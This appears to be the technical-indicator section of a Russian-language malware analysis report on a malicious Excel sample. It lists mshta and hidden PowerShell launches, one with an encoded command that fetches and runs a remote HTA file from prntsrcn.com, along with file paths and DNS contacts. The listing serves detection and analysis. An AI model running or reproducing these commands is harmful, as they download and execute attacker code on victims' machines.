Техническая информация
- '%WINDIR%\syswow64\mshta.exe' "C:\Users\Public\a.hta"
- C:\users\public\a.hta
- <Текущая директория>\8fd31000
- C:\users\public\a.hta
- <PATH_SAMPLE>.xls
- 'pr###rcn.com':443
- 'pr###rcn.com':443
- DNS ASK pr###rcn.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' powershell -exEC byPass -w hidden -enC bQBzAGgAdABhACAAIgBoAHQAdABwAFMAOgAvAC8AcAByAG4AdABzAHIAYwBuAC4AYwBvAG0ALwB1AC4AaAB0AGEAIgA=' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' powershell -exEC byPass -w hidden -enC bQBzAGgAdABhACAAIgBoAHQAdABwAFMAOgAvAC8AcAByAG4AdABzAHIAYwBuAC4AYwBvAG0ALwB1AC4AaAB0AGEAIgA=
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -exEC byPass -w hidden -enC bQBzAGgAdABhACAAIgBoAHQAdABwAFMAOgAvAC8AcAByAG4AdABzAHIAYwBuAC4AYwBvAG0ALwB1AC4AaAB0AGEAIgA=
- '%WINDIR%\syswow64\mshta.exe' httpS://prntsrcn.com/u.hta